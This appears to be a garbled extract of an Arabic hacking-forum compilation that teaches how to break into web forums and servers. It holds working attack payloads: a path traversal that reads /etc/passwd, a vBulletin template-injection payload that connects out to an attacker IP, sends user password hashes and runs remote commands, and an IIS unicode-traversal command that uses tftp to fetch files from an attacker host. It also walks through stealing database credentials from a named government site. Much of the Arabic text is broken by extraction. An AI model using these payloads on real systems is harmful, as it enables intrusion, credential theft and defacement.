ٍﺳﻬ ﻞ.
ﺘﺨﺪﻣﯿﻦ وﻫﺬاأ ﺘﺨﺪمأو ﻣﺠﻤﻮﻋﺔ ﻣﻦاﻟﻤﺴ ﺘﺼﺎرﯾﺢ ﻣﻤﻜﻦ ﻣﻨ ﺤﻬﺎﻟﻤﺴ واﻟ
ﺘﻢﺘﻠﻚﻛ ﻞ ﻣﻮرد ﻣﻦاﻟﻤﻮاردﻗﺎﺋﻤﺔﺗ ﺤﻜﻢﺑﺎﻟﻮ ﺻﻮ ل ) Access Control List (ACLﻮﻛ ﻞ ﻣﻌﻠﻮﻣﺔ ﯾ ﯾﻤ
إد ﺧﺎﻟﻬﺎﻓﻲ ACLﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ Access Control Entry (ACE).
ﺘﻪ
ﺘﺨﺪمأو ﻣﺠﻤﻮﻋ ﺘﻮي ﻋﻠﻰ SIDﻟﻠﻤﺴ ﺘﺨﺪاماﻟﻤﻮرد وﺗ ﺤﺘﺼ ﺮﯾﺢ ﻹﺳ ﺘﻢﺈﻧﺸﺎ ء ACEﻋﻨﺪ ﻣﻨﺢاﻟ ﯾ
ُﻨﺢﺗﺼ ﺮﯾﺢﻗ ﺮا ءة وﺘ ﺮ ﺿﻨﺎأن ﻣﺪﯾ ﺮ ﻣﺠﻤﻮﻋﺔ ﻣﺎﻗﺪ ﻣ ﺘﺼ ﺮﯾﺢ،ﻓﻠﻮاﻓﺘﺼ ﺮﯾﺢﺑﺎﻹ ﺿﺎﻓﺔاﻟﻰ ﻧﻮ عاﻟ اﻟﻤﻤﻨﻮ ﺣﺔاﻟ
ﺘﻮيﺘﻪاﻟﻰ ACLﺎﻟﺨﺎ صﺑﺎﻟﻤﻠ ﻒ و ﺳﯿ ﺤ ﺘﻢإﻧﺸﺎؤهﺛﻢإ ﺿﺎﻓ ﺘﺎﺑﺔﻟﻤﻠ ﻒ ﻣﺎﻓﺈن ACEﺟﺪﯾﺪ ﯾ ﺗﺼ ﺮﯾﺢﻛ
ﺘﺎﺑﺔ.ACEﻋﻠﻰ SIDﻟﻤﺪﯾ ﺮاﻟﻤﺠﻤﻮﻋﺔﺑﺎﻹ ﺿﺎﻓﺔاﻟﻰﺗﺼ ﺮﯾﺢﻗ ﺮا ءة وﺗﺼ ﺮﯾﺢﻛ
ﺘﻢﺗﺮﺗﯿﺐ ACEﺑ ﺤﯿﺚﺗﻜﻮن AccessDenied ACEsﻗﺒ ﻞ ﻓﻲ وﯾﻨﺪوز NTﻮ وﯾﻨﺪوز ٢٠٠٠ﯾ
ﺘﻚﻓﻲأي ﻣﻦ AccessDenied ACEs AccessAllowed ACEs ،ﻓﺈذا وﺟﺪ SIDﺧﺎ ﺻ
ﺘﺄﻛﺪ ﻣﻦاﻟ ﺤﻘﻮ ق
ﺘﻤﻨﻊ ﻣﻦاﻟﻮﺻﻮ لاﻟﻰاﻟﻤﻮرد وإﻻﻓﺴﯿﺒ ﺤﺚﻓﻲ AccessAllowed ACEsﻟﻠ ﻓﺴ
ﺘﻌ ﺮ ض رﺳﺎﻟﺔﺗ ﺤﺬﯾ ﺮﺗﻤﻨﻌﻚ ﻣﻦاﻟﻮﺻﻮ لﻟﻠﻤﻮرد.
ﺘﻚﻓﺴ اﻟﻤﻤﻨﻮ ﺣﺔﻟﻚﻓﺈنﻟﻢ ﯾﻌﺜ ﺮ ﻋﻠﻰ SIDﻣﻄﺎﺑ ﻖﻟﺨﺎ ﺻ
ﻣﻠﺨ ﺺاﻟﺪرس:
-٢ﺗﺼﺎرﯾﺢاﻟﻮ ﺻﻮ ل...
٦٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐ:اﻟﻌﻘ ﺮباﻷ ﺣﻤ ﺮ
$$$$$$$$$$$$$$
*************************************************************************
ﺘﺪﯾﺎ ت ﻮاﻧﻮاﻋﻪ
-١ﺎﻟﻤﻨ
^^^^^^^^^^^^^
2
?http://www.vbulletin.org/index.php
|=forum/view.php&topic=../../../../../../../etc/passwd
٦٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
********************************************************** ********************
ﻗﻪ ﺘ ﺮا
ﻃ ﺮﯾﻘﺔ ﺎ ﺧ-٢
^^^^^^^^^
ﺟﻤﯿﻊاﻻﺻﺪارا ت
ﺘﺬﻛ ﺮو ﯾﻤﻜﻦﺑﻌ ﻀﻜﻢ ﺑ١١٣ ﻓﻠﻨﺒﺪي ﻣﻦ ﺻﻔ ﺮ ﻧﺴﺨﺔ
وﻫﺬا، ﺘﺪﯾﺎ ت ﯾ ﺤﺐ ﯾ ﺮﻛﺒﻪﻗﻠﯿﻠﯿﻦاﻟﺨﺒ ﺮهﻓﻲأﻏﻠﺐاﻷ ﺣﯿﺎن
وﻫﺬااﻟﻨﻮ ع ﻣﻦاﻟﻤﻨ، ﺘﺪﯾﺎ تاﻟﻔﻲﺑﻲ ﻛﻠﻨﺎ ﻧﻌ ﺮ ف ﻣﻨ
ﺘﺪى ﻫﻮاﻟﻤﻌ ﺮو ف ﻋﻨﺪﻧﺎاﻟﻌ ﺮبﺑﻜﺜ ﺮه اﻟﻤﻨ
) Jouko Pynnonen ﺘﻘﺪ ﺘﺒﻪاﻟﻔ ﺮﻧﺴﻲ )ﻋﻠﻰ ﻣﺎأﻋ ﺎﻷو لاﻟﻠﻲﻛ
A remote user may thus execute any PHP code and programs as the
web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
containing the forums and user information.
DETAILS
=======
٦٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
if ($action=="faq") {
eval("echo dovars(\"".gettemplate("faq")."\");");
}
function gettemplate($templatename,$escape=1) {
// gets a template from the db or from the local cache
global $templatecache,$DB_site;
if ($templatecache[$templatename]!="") {
$template=$templatecache[$templatename];
} else {
$gettemp=$DB_site->query_first("SELECT template FROM template
WHERE title='". addslashes($templatename)."'");
$template=$gettemp[template];
$templatecache[$templatename]=$template;
}
if ($escape==1) {
$template=str_replace("\"","\\\"",$template);
}
return $template;
}
٦٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
http://www.site.url/index.php?action=faq&templatecache
[faq]=hello+world
With this URL, you won't get the FAQ page, but just a blank page
with the words "hello world".
echo dovars("hello"world");
"world http://www.site.url/member.php?acti...ypass&url=hello
vb 113 or 115 رﻛﺐﻓﻲ ﺟﻬﺎزك ﻣﻠﻘﻢ وﯾﺐأي ﻣﻠﻘﻢﺗ ﺤﺒﻪ ﻣﻤﻜﻦﺗ ﺮﻛﺐ ﻋﻠﯿﻪ-١
(ﺘﺢاﻟﺒﻮر تﺗﻜﻮن ﻋﻠﻰ ﻣﺠﺎزك
ﻋﻨﺪكﻓﻲ ﺟﻬﺎزك ) ﻃ ﺮﯾﻘﻪﻓ٩٠ ﺘﺢاﻟﺒﻮر ت ﺄﻓ-٢
ﻫﺬااﻟﻰاﻟﺴﯿ ﺮﻓ ﺮurl ـ
أرﺳ ﻞاﻟ-٣
٦٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
search.php3?action=simplesearch&query=searchthis&templatecache[s
tandardredirect]="%29%3B%24fa="<%261";set_time_limit(substr("900"
,0,3));%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),%26%
24errno,%26%24errstr,substr("900"
,0,3));if(!%24fp){}else{%24arr[200];fputs(%24fp,su
bstr("vhak1.0,%20-
d%20downloads%20database,or%20press%20return%20for
%20command%20line"
,0,63));%24va=fgets(%24fp,3);fputs(%24fp,%24va);if
(strlen(%24va)>1){include(substr("admin/config.php",0,16));include(sub
str("admin/config.php3",0,17));mysql_connect(substr("%24servername
",0,strlen(%24servername)),substr("%24dbusername",0,strlen(%24dbus
ername)),substr("%24dbpassword"
,0,strlen(%24dbpassword)));%24currenta=mysql_db_qu
ery(substr("%24dbname",0,strlen(%24dbname)),substr("select%20*%20
from%20user" ,0,18));while(%24res=mysql_fetch_array%20(%24curre
nta)){fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid
],");fputs(%24fp,"%24res[password],");fputs(%24fp,"%24res
%24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),%24arr);for(%24ir=
substr("0",0,1);%24ir<
sizeof(%24arr);%24ir%2B%2B){fputs(%24fp,%24arr[%24
ir]);fputs(%24fp,%24va);}}fclose(%24fp);}die(vhak_
finished_execution);echo%28"
By Kill -9
ﻫﺬا ﻣﺜ ﻞ ﻣﺎ ﺻﺎر، ﻣﻤﻜﻦﺗ ﺮﺳ ﻞﻛﻮد ﯾﺴﺠ ﻞﻟﻚأدﻣﯿﻦ، ﺘﻨﻔﺬ ﺘ ﺮ عﻛﻮدﺛﺎﻧﻲ وﺗ ﺮﺳﻠﻪ وﺗﻼ ﺣﻆأﻧﻪ ﯾ ﻣﻤﻜﻦأﻧ ﺖﺗﺨ
ﻮc4arab.com ﻮﻛﻤﺎن ﺻﺎرﻓﻲ، ﺘﻨﺒﯿﻪ ﻗﺎﺋﻲ ﻃﺒﻌﺎ( ﻣﻦﺑﺎباﻟ ﺄ ﺻﺪarabteam2000.com (ﻓﻲ
ووا ﺿﺢأﻧﻪ ﻋﻤ ﻞﺑﺴﯿﻂ، ﺘﺨ ﺮﯾﺐ ﺘ ﺤﺬﯾ ﺮ وﻟﯿ ﺲاﻟ
ﺑﻬﺪ ف ﺎﻟ، ﺘﺪﯾﺎ ت
وﻛﺜﯿ ﺮ ﻣﻦاﻟﻤﻨ... ﻃ ﺮﯾ ﻖاﻹﺳﻼم واﻟﺜﻘﺎﻓﻪ
وﻟﻜﻦ ﻣﺴ ﺤ ﺖاﻟﺪاﺗﺎﻟﺒﯿ ﺲ وﻫﺬا ﺳﻬ ﻞﻟﻠﻐﺎﯾﻪ، ﺘﻘﺪأﻫﻠﯿﺰﺰﻣﺎن ﺻﺎرﻓﯿﻪ أﻋ، ﺘﻔﻜﯿ ﺮ ﺘﺎجﻟﺸﻮﯾﻪ ﻣﻦاﻟ ﯾﺤ
!! ﺘﻬﺎﻟﻠﻲ ﺣﺐ ﯾﺠ ﺮبﻓﻘﻂ
ﻮ ﺣﻄﯿ، ﻃ ﺮﯾﻘﻪﻗﺪﯾﻤﻪ ﻧﻮﻋﺎ ﻣﺎ
٦٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘ ﺮا ق ﻣﻦ ١١٥اﻟﻲ ٢٢٥
ﻃ ﺮﯾﻘﺔا ﺧ
ﺘ ﺮﻧ ﺖ( ﺎﻛﺴﺒﻠﻮرر( .
ﺘﺼﻔﺢاﻧ
ﺘﻄﻠﺒﺎ ت( : WebServerﺗ ﺮﻛﯿﺐ ﺳﯿ ﺮﻓ ﺮ ﻋﻠﻰ ﺟﻬﺎزكاﻟﺸﺨﺼﻲ( +ﻣ
ﺎﻟﻤ
ﺘﻮﺳﻂﺘﻮى :ﻣ ﺎﻟﻤﺴ
ﺘﺪﯾﺎ ت .
ـ vBulletinﻓﻘﻂ !! ﯾﻤﻜﻦانﺗﺠ ﺮﺑﻬﺎ ﻋﻠﻰاﻧﻮا عا ﺧ ﺮى ﻣﻦاﻟﻤﻨ
ﻣﻼ ﺣﻈﺔ :ﻫﺬهاﻟﻄ ﺮﯾﻘﺔﻟﺴ ﺖﻟﻠ
----------
ﺎﻟﺜﻐ ﺮة :
---------
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
٦٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
******************* ***************************************************************
ـ SQL ـــ
ﺘ ﺮا قاﻟ
-٣ﺄ ﺧ
^^^^^^^^^^^^^
ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞاﻟﻌﻘ ﺮبﺑﯿﻜﻮناﺳ ﺮ عﻟﻤﻦﻟﺪﯾﻪ ﻧﺴ ﺦ ﻣﻨﻪ ﯾﻤﻜﻨﻚاﺳ
ﺲ :ﻓﻲاﻟﺒﺪاﯾﺔ ﻣﺎﻫﻲاﻻسﻛﯿﻮا ل) ( SQL؟؟
ﺘﻬﯿﺔ ب ﺘﻲﺗﻜﻮن ﺻﻔ ﺤﺎﺗﻬﺎ ﻣﻨ ﻗﻊاﻟ ﺘﻮي ﻋﻠﻰ ﺟﺪاو ل واﻏﻠﺐ ﺎﻟﻤﻮا ﺎﻻسﻛﯿﻮا لﻫﻲ ﻋﺒﺎرة ﻋﻦﻗﺎﻋﺪﺑﯿﺎﻧﺎ تﺗ ﺤ
ASPﻫﻲ ﺻﻔ ﺤﺎ تﺗﺴ ﺤﺐﺑﯿﺎﻧﺎﺗﻬﺎ ﻣﻦﻗﺎﻋﺪة SQLﻮ ﺻﻔ ﺤﺎ ت ASPﻣﻤﻜﻦانﺗﻜﻮنﻛﻨﺰ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت
ﺘﻨﺼ ﺖ ﻋﻠﻰاﻟﺒﻮر ت ١٤٣٣ ﺘ ﺮا قﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت SQLﻮﻫﺬا ﻣﺎﺳﻮ ف ﺎﺷﯿ ﺮاﻟﯿﻪ ﻻ ﺣﻘﺎ ،و SQLﺗ ﻻﺧ
ﺘﻮي ﺘﻮي ﻋﻠﻰاﻛﺜ ﺮ ﻣﻦﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت وﻛ ﻞﻗﺎﻋﺪةﺑﯿﺎﻧﺎ تﺗ ﺤ ﺎﯾ ﻀﺎ ﻣﺎارﯾﺪانا ﺧﺒ ﺮكﺑﻪان ﺎ ل SQLﻗﺪﺗ ﺤ
ﺘﻮﯾﻬﺎ . ﺘﻰﺗ ﺤﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت SQLﻮاﻟﻌﺪداﻟﻜﺒﯿ ﺮ ﻣﻦاﻟﺒﯿﺎﻧﺎ تاﻟ ﺘﺼﻮرﻛﺒ ﺮ ﻋﻠﻰ ﻋﺪد ﻣﻦ ﺎﻟﺠﺪاو ل ﯾﻤﻜﻦ انﺗ
ﻗ ﺖﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت SQL؟ ﺘﺮ
ﺘﻔﯿﺪ ﻣﻨﻪاذاا ﺧﺲ :ﻣﺎﻟﺬي ﯾﻤﻜﻦاناﺳ
ﺘﺪﯾﺎ ت ASPﻓﻲ ﺘﺪﯾﺎ ت PHPﺑ ﻞ ﻣﻨ ﻗﺼﺪ ﻣﻨ ﺘﺪى ﻻا ﻗﻊ ﻣﻨﻗﻊاذاﻛﺎن ﻫﺬااﻟﻤﻮ ﻫﺬا ﻋﻠﻰ ﺣﺴﺐ ﻧﺸﺎطاﻟﻤﻮ
اﻟﻐﺎﻟﺐ ﺳﻮ فﺗ ﺤﺼ ﻞ ﻋﻠﻰ ﺟﻤﯿﻊاﺳﻤﺎ ء
ﺘﺨﺪﻣﯿﻦ وﻛﻠﻤﺎ تاﻟﺴ ﺮ ﻮﺑﺎﻣﻜﺎﻧﻚﺗﻌﺪﯾ ﻞ و ﺣﺬ فاي ﻣﻮ ﺿﻮ ع و ﺻﻼ ﺣﯿﺎ تﻟﻢﺗﻜﻦﺗ ﺤﻠﻢﺑﻬﺎ ،اﻣﺎاذاﻛﺎن ﺎﻟﻤﺴ
ﺘﻮي ﻋﻠﻰ ﻣﯿﺰة ﻗﻊ ﯾ ﺤاﻟﻤﻮ
ﻗﺎﺋﻤﺔاﻟﻤ ﺮاﺳﻼ تﻓﺴﻮ فﺗ ﺤﺼ ﻞ ﻋﻠﻰاﻋﺪاد ﺧﯿﺎﻟﯿﺔ ﻣﻦاﻻﯾﻤﯿﻼ ت ،ﻋﻨﺪﻫﺎﻗﻢﺑﺎﻧﺸﺎ ء ﺷ ﺮﻛﺔﻟﻠﺪﻋﺎﯾﺔ واﻻﻋﻼن
وﺳﻮ فﺗﺼﺒﺢﺛ ﺮﯾﺎاذن ﻻﺗﻨﺴﻰ _LinuxRay
ﻗﺎم ﻫﻮاﺗ ﻒ -ﻋﻨﺎوﯾﻦ -ﺗﻮراﯾ ﺦاﻟﻤﯿﻼد ، ﻗﻊانﺗﺠﺪ ﺎي ﺷﺊ دا ﺧ ﻞﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ﻣﻌﻠﻮﻣﺎ تاﺷﺨﺎ ص -ار ﺗﻮ
ﻣﻤﻜﻦانﺗﺼﺒﺢ Administrator .
ﺘﻌﺪ ﻧﺸﺎ ﻃﻚ ﻣﻦ ﺟﺪﯾﺪﻓﺎﻟﻄ ﺮﯾ ﻖ ﻣﺎزا ل ﻃﻮﯾﻼ ... ﺎﻋ ﺮ فاﻧﻪﻗﺪا ﺻﺎﺑﻚاﻟﻤﻠ ﻞاﻻنﻟﻜﻦاﺳ
ﺘﺎﺟﺔﻟﻠﺪ ﺧﻮ ل ﻋﻠﻰﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت SQL؟ ﺲ :ﻣﺎﻟﺬيﺗ ﺤ
ﺘﺎجﻓﻘﻂﻟ ﻞ User Nameﻮ Passwd ﺗﺤ
٧٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
<%
>%
------------------------------------------------------------------
ﺘﺨﺪمﻫﻮ _LinuxRay ﻓﻲ ﺎﻟﻜﻮداﻟﺴﺎﺑ ﻖﺗ ﺮىاناﺳﻢاﻟﻤﺴ
ﻮﻛﻠﻤﺔاﻟﺴ ﺮﻫﻲ ٦٦٦٦٦٦٦
------------------------------------------------------------------
ﺘﻮي ﻋﻠﻰاﺳﻢ
ﺘﻢﺗﻨﻔﯿﺬﻫﺎ ﻣﻦ ﺟﺎﻧﺐاﻟﻤﻠﻘﻢ وﯾ ﺤ
ﺘﻮي ﻋﻠﻰاواﻣ ﺮ ﯾ
ﺘﺪاد *.incﻫﺬا ﻣﻠ ﻒ ﯾ ﺤ
ﺘﻬﻲﺑﺎﻣ ﻫﻨﺎك ﻣﻠ ﻒ ﯾﻨ
ﺘﺨﺪم وﻛﻠﻤﺔ ﺎﻟﻤ ﺮور اﻟﻤﺴ
ﻗﻊ .
ﺘﻈ ﺮﻗﻢﺑﺴ ﺤﺐ ﻫﺬااﻟﻤﻠ ﻒ وذﻟﻚﺑﺎ ﺿﺎﻓﺔاﺳﻢاﻟﻤﻠ ﻒﻓﻲ ﻋﻨﻮان ﺎﻟﻤﻮ اذن ﻣﺎذاﺗﻨ
٧١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
global.asa
++global.asa
beforemilion-global.asa
-global.asa
milion.sql
global-direct.asa
global.asa+.htr
٧٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺎياﻧﺸﺎ ء
ﺘ ﺮى ﻣ ﺮﺑﻊ
ﺎﻻن ﺳ
Data Link Properties
-٣ﻛﻠﻤﺔاﻟﺴ ﺮ Password
ﺘﺒﺎراﻻﺗﺼﺎ لﺑﻘﺎﻋﺪة ﺎﻟﺒﯿﺎﻧﺎ تاذا رأﯾ ﺖ ﻫﺬه ﺎ ﺿﻐﻂﻓﻲاﻟﺒﺪاﯾﺔ ﻋﻠﻰ Test Connectionﻓﻲاﻻﺳﻔ ﻞ ﻻ ﺧ
اﻟﻌﺒﺎرة Test Connection Succeeded
ﻓﻤﻌﻨﺎهاناﻻﺗﺼﺎ لﺑﻘﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تﺗﻢﺑﻨﺠﺎ ح.
ﺘﺎرايﻗﺎﻋﺪةﺑﯿﺎﻧﺎ تﺗ ﺮﯾﺪاﻟﺪ ﺧﻮ ل ﺎﻟﯿﻬﺎ ﻣﻦاﻟﻘﺎﺋﻤﺔاﻟﻤﺴﻨﺪﻟﺔ : ﯾﻤﻜﻨﻚاﻻنانﺗﺨ
Select the data base on the server
ﻮا ﺿﻐﻂ ﻋﻠﻰ OKﺎو ﻣﻮاﻓ ﻖ .
ﺘﺠﺎرب :
ﻓﺌ ﺮاناﻟ
ﻗﻊ http://www .moe.gov.sa/ ﻣﻮ
ﺘﺎﻟﯿﺔ :
ﻗﻢﺑﺎﻟﺪ ﺧﻮ ل ﻋﻠﻰاﻟﺼﻔ ﺤﺔ ﺎﻟ
1-
http://www.moe.gov.sa/news_admin.asp
ﺘ ﺮى ﻣﺎﯾﻠﻲ
ﺳ
ﺘﺎﻟﻲ :
ﺛﻢ ﻃﺒ ﻖ ﻋﻠﯿﻬﺎﺛﻐ ﺮة htrﻛ
http://www .moe.gov.sa/news_admin.asp+.htr
٧٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘ ﺮى
ﺎذﻫﺐاﻟﻰ ﺎﻟﺴﻮرسﻟ
><!--#include file = "database.inc"--
ﺘﺎﻟﻲ :
ﻗﻢﺑﺴ ﺤﺐ ﻣﻠ ﻒ database.incﻛ
http://www.moe.gov.sa/database.inc
<%
>%
ﺘﺸﺒﯿﻚ ﻋﻠﻰﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت
ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور .....ﺳﺎر عﺑﺎﻟ
ﻫ ﻞﺗﻌ ﺮ ف ﻣﺎﻟﺬياﻣﺎم ﻋﯿﻨﻚاﻻناﻧﻪاﺳﻢاﻟﻤﺴ
اﻧﺎاﻋ ﺮ فان ﻻا ﺣﺪ ﯾ ﺤﺐ ﻣﺎدة
ﺎﻟﻜﯿﻤﯿﺎ ء .
ﺘﺠﺎرباﻟﺜﺎﻧﻲ :
ﻓﺄراﻟ
********************************************************************************
ﺘﺪﯾﺎ ت
ﺘ ﺮا قاﻟﻤﻨ
-٤ﺳ ﺮﻓ ﺮا تاﻟﻮﯾﻨﺪوز ودورهﻓﻲا ﺧ
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ﺘﺪي ﯾﻌ ﺮ فﺛﻐ ﺮا تاﻟﻮﯾﻨﺪوز ﺟﯿﺪا دا ﻧ ﺤﻦ ﺎﻟﻬﻜ ﺮز وايﻫﻜ ﺮز ﻣﺒ
ﺛﻐ ﺮاﺗﻪﺑﺎﻻاﻟﻮ فﻮﻫﻲ ﻧﻈﺎمﻓﺎﺷ ﻞ %٨٠و
ﺘﺎ ت
ﺛﺒ
ﻗﻠﻜﻢﻟﯿ ﺶﺑﺎا
ﺘ ﻀﯿ ﻒ ﺳ ﺮﻓ ﺮا ت وﯾﻨﺪوز را حاﻗﻊ ﯾﺴ ﺘﺪي وﻣﻮ وﻻاﻧﺼﺢايا خﻟﺪﯾﻪ ﻣﻨ
ﺘﻮي ﻋﻠﻲ
ﺻﻮر ٢ﻫﻮ ﺻﻮرةﻟﺠﻤﻌﯿﺔاﻣ ﺮﯾﻜﻲ ﻣﻬﻢ و ﺣﺠﻢﻗﺎﻋﺪا تاﻟﺒﯿﺎﻧﺎ ت ١٫٥ﻛﯿﻚ ﯾﻌﻨﻲ 15000ﻣﯿﻚ وﯾ ﺤ
ﻗﻊﻟﺠﺎﻫﺰيﻛﺎﻣﻼﻗﻪاﻟﺒﺎر ﺣﻪﺑﻨﻔﺴﻲ ﺟﺎريﺗ ﺤﻤﯿ ﻞاﻟﻤﻮ ﺘ ﺮا
ﺘ ﺮكﺗﻢا ﺧ
ﺧﻤﺴﺔ ﻣﻠﯿﻦ ﻣﺸ
٧٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٧٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٧٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
.........................................................................................
ﻮاﻟﺸ ﺮطاﻟﺜﺎﻧﻲ ﻫﻮ
ﺘﻲإ فﺗﻲﺑﻲ ﯾﺠﺐأن ﯾﻜﻮن ﻋﻨﺪكﺑ ﺮﻧﺎﻣ ﺞاﻟ
ﻮﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞﺗﻘﺪرﺗﻨﺰﻟﻪ ﻣﻦﻫﺬااﻟﻌﻨﻮان
www.geocities.com/anorR1234/tftpd32.zip
ـ\C:ﻮﺑﻌﺪ ﻣﺎﺗﻨﺰ ل ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ وﺗﻔﻚاﻟ ﻀﻐﻂ ﻣﻨﻪ ﻣﻦاﻻﻓ ﻀ ﻞإﻧﻚﺗ ﺤﻄﻪ دا ﺧ ﻞاﻟ
ﺘﻲﺗ ﺮﯾﺪأنﺗﻌﻤ ﻞﻟﻬﺎأﺑﻠﻮدﻓﻲاﻟﺴﻲ ﻮﺗ ﺤﻂأﯾ ﻀﺎاﻟﺒ ﺮاﻣ ﺞأو ﺎﻟﺼﻔ ﺤﺔاﻟ
ﻗﻊ ﺗ ﺤﻄﻪﻓﻲاﻟﺴﻲاﻟﻰ دا ﺧ ﻞ ﺟﻬﺎزك ﻣﻮ ﺎﻟﻰ داﻟﺨ ﻞاﻟﻤﻮ
ﻮﺗﺸﻐ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ
ﺘﻚاﻷﺳﺎﺳﯿﺔ ﺘﻬﻰ ﻣﻦ ﻣﻬﻤ ﺘ ﺮﻛﻪ ﯾﻌﻤ ﻞاﻟﻰأنﺗﻨ tftp32.exeﻮﺗ
\C:ﺄﺳﻤﻊﻛﻼﻣﻲ و ﺣﻂﻛ ﻞ ﺷﻲﻓﻲ
ﺘﻬﺎﺑﺈذنا ﷲ را حﺗﻨﺠﺢاﻟﻤﻬﻤﻪ ﻷﻧﻚﻟﻮ ﺣﻄﯿ
-----------------------------------------------------------------
ﺎﻻنﺑﺪأﻧﺎﻓﻲاﻟﻨﻘﻄﺔاﻟﺨﻄ ﺮة وﻫﻲﺗ ﺤﻤﯿ ﻞاﻟﻤﻠﻔﺎ ت
ﺘ ﺤﻤﯿ ﻞاﻻﺑﻠﻮد ﻗﺼﺪﺑﺎﻟ ﻣﻊاﻟﻌﻠﻢأﻧﻲا
ﺄي
ﺄﺑﻠﻮد =ﺗ ﺤﻤﯿ ﻞ
ﻣﻮﺗﺠﻤﯿ ﻞ
ﺘﻘﺪأﻧﻜﻢ را حﺗﻔﻬﻤﻮ ﺘﻔﺎﺋ ﻞﺑﺎﻟﺨﯿ ﺮﻷﻧﻲ ﻣﻌ ًﺑ ﺲﺄﻧﺎ ﻣ ﻮﺗ ﺤﻤﯿ ﻞاﻟﻤﻠﻔﺎ ت ﻃ ﺮﯾﻘﺔ ﻣﻌﻘﺪة ﻧﺴﺒﯿﺎ
ﺎﻟﻤﻬﻢ ﻧ ﺮﺟﻊﻟﻤﻮ ﺿﻮﻋﻨﺎ
ﺘﺼﻔﺢ ًاﻟﻰاﻟﻤ ﺎﻟﻤﻬﻢ ﻃ ﺮﯾﻘﺔ ﻧﺴ ﺦاﻟﻤﻠﻔﺎ تﺗ ﻀﺎ فاﯾ ﻀﺎ
ﻮﺗ ﻀﺎ فﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ
ﻣﺜﺎ ل :
\http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:
ﺘﻐﻠ ﺖ ﻣﻌﺎك ﺗﺨﯿ ﻞ ﺎﻟﺜﻐ ﺮةﻫﺬهاﺷ
ﻮﯾﺠﺐ ﻋﻠﯿﻚإﻧﻚﺗﻤﺴﺢﺑﻌ ﺾاﻹ ﺿﺎﻓﺎ ت ﻣﻦاﻟﺜﻐ ﺮةﻟﻜﻲﺗ ﻀﯿ ﻒ ﺎﻣ ﺮاﻟﻨﺴ ﺦ
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
ﯾﻌﻨﻲ ﺎﻟﻰ را ح ﻧﻤﺴ ﺤﻪ ﻣﻦاﻟﺜﻐ ﺮةﺑﯿﻜﻮن ﻫﺬهاﻻ ﺿﺎﻓﺔ
\/c+dir+c:
ﻋﺸﺎنﺗﻈﯿ ﻒﺑﺪاﻟﻬﺎ
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
ﻮﻟﻤﻦ ﻧﻈﯿ ﻒاﻣ ﺮاﻟﻨﺴ ﺦﺑﯿﻄﻠﻊﻟﻨﺎﺑﻬﺬااﻟﻄ ﺮﯾﻘﺔ
"-http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+
i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
ﺷﺎﯾﻔﯿﻦ ﯾﺎﺷﺒﺎبإ شاﻟﻰاﺗﻐﯿ ﺮ
ًإﻧﻚﺗﻐﯿ ﺮاﻟﻼزمﻓﻲأﻣ ﺮاﻟﻨﺴ ﺦ ﺑ ﺲ ﻻزمأﯾ ﻀﺎ
ﻣﺜ ﻞ
ﺘﻲا فﺗﻲﺑﻲاﻟﻰ ﺣﺎ ﻃﻪﻓﻲ ﺎﻟﺴﻲ وﻣﺸﻐﻠﻪاﻻن tftp.exeﻫﺬا ﺳﯿﺒﻪﻓﻲ ﺣﺎﻟﻪ ﻻﻧﻪاﺳﻢﺑ ﺮﻧﺎﻣ ﺞاﻟ
